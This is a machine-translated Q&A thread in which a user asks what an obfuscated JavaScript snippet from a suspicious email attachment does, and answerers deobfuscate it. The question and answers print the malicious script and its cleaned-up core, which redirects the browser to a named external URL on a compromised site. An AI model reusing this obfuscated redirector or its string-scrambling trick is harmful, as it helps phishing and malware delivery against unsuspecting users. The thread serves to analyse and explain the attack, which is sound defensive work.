6

IT以外の同僚の何人かは、非常に疑わしいと思われる.html添付ファイルを電子メールメッセージで開きました。一部のJavaScriptコードが実行されたように見えると、空白の画面が表示されました。

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

それは何をしましたか?それは私のプログラミング知識の範囲を超えています。

4

4 に答える 4

19

URLにリダイレクトされます' http://lendermedia.com/images/z.htm '(自己責任でフォローしてください)。

コードをコピーして価値のあるJavaScriptエディターに貼り付け、ソースをフォーマットしてもらいます。

キーポイント:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h' http://lendermedia.com/images/z.htm 'に等しくなります

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

tへの参照が含まれますdocument.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

の名前のプロパティhrefb、この時点で(別の関数内で)実際にはt上記のステートメントからのhものであり、URLであるに設定されます。

ほとんどのコードは単なるノイズであり、実際の機能は次のとおりです。

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();
于 2010-06-10T07:12:21.327 に答える
2

同じ問題が発生し、このページを見つけました。連絡先情報についてWHOISを行った後、lendermedia.comの所有者に連絡しました。彼のサイトは、z.htm彼の知らないうちに、彼の希望に反してページをホストしていることを知りました。彼に連絡したとき、私は彼の/images/ディレクトリを閲覧することができました。その後、彼は権限を変更しました。この男はきれいに見えると言うのはこれだけですが、それはあなたが決めることです。

于 2010-06-10T19:21:22.683 に答える
0

難読化を差し引いて、それは次のようなことをしますdocument.location.href="http://lendermedia.com/images/z.htm"

于 2010-06-10T07:38:05.830 に答える
0

コードがパーツであることを理解するための重要なreplace(/[\^H\!9X]/g, '')パーツ。replaceの2番目の引数がである場合''、それは単に前の文字列からものを削除しているだけです。

物事を難読化するための本当にエレガントでない方法。おそらく目的は、ユーザーごとにランダムになり、ベイジアンスパムフィルターを回避することです。

于 2010-06-10T15:06:51.430 に答える